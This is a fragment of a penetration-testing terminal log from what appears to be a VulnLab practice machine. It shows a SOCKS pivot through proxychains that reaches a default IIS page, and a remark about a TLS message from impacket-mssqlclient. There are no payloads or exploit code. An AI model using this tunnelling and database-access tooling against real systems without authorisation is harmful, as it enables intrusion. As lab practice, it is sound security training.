└─$ proxychains curl http://127.0.0.1
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:80 ... OK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#0072C6;
margin:0;
}
#container {
margin-left:auto;
margin-right:auto;
text-align:center;
}
a img {
border:none;
}
-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$
someting must be wrong with my impacket-mssqlclient Encryption required, switching to TLS
…